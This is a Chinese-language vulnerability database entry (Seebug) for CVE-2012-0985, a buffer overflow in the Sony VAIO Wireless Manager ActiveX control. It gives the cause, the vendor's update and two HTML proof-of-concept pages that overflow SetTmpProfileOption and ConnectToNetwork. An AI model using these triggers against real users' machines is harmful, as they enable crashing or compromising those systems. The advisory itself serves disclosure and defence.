Lucene search
RootSSV:60172HistoryJun 01, 2012 - 12:00 a.m.
Sony VAIO Wireless Manager ActiveX控件'WifiMan.dll'缓冲区溢出漏洞
2012-06-0100:00:00
Root
www.seebug.org
11
0.251 Low
EPSS
Percentile
96.2%
Bugtraq ID: 53735
CVE ID:CVE-2012-0985
Sony VAIO Wireless Manager是索尼笔记本上安装的无线管理程序。
Sony VAIO Wireless Manager ActiveX控件存在缓冲区溢出,攻击者可以利用漏洞以应用程序上下文执行任意代码。
漏洞是由于WifiMan.dll库中的SetTmpProfileOption()和ConnectToNetwork()方法没有正确检查字符串参数长度引起的,攻击者可以构建恶意WEB页,诱使用户解析来触发。
0
Sony VAIO Wireless Manager 4.0.0.0
厂商解决方案
Sony
Sony厂商建议用户使用VAIO更新安装此软件的最新版本:
http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946
1.
<HTML>
<BODY>
<object id=ctrl
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
arg1=1
arg2=String(8212, "X")
arg3="defaultV"
SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>
2.
<HTML>
<BODY>
<object id=ctrl
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
arg1=1
arg2=String(6164, "X")
target.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>
Related
nessus
nessus
prion
prion
Buffer overflow
2012-06-07 19:55:00
securityvulns
securityvulns
Sony VAIO Wireless Manager ActiveX security vulnerabilities
2012-05-31 00:00:00
2 Buffer Overflows in Wireless Manager Sony VAIO
2012-05-31 00:00:00
packetstorm
packetstorm
Wireless Manager Sony VAIO 4.0.0.0 Buffer Overflows
2012-05-30 00:00:00
cvelist
cvelist
CVE-2012-0985
2012-06-07 19:00:00
htbridge
htbridge
2 Buffer Overflows in Wireless Manager Sony VAIO
2011-12-07 00:00:00
cve
cve
CVE-2012-0985
2012-06-07 19:55:00
exploitpack
exploitpack
Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflow
2012-05-31 00:00:00
exploitdb
exploitdb
Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflow
2012-05-31 00:00:00